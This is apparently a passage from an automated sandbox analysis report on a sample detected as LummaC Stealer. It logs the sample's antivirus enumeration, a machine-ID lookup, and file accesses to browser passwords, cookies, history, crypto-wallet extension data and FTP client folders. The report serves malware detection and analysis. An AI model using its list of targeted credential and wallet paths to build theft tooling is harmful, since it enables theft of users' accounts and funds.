Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\get_txt.ps1 VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Temp\cmd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: cmd.exe, 0000000A.00000003.2090430093.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2066952978.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2090831892.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2067377432.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Temp\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6128, type: MEMORYSTR
Source: Yara match	File source: 10.3.cmd.exe.c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.cmd.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1899525334.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: cmd.exe, 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ets/ElectronCash
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: enllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnm8s
Source: cmd.exe, 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Ex
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fX
Source: cmd.exe, 0000000A.00000003.2044195581.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000000.00000002.1410768611.0000000005829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
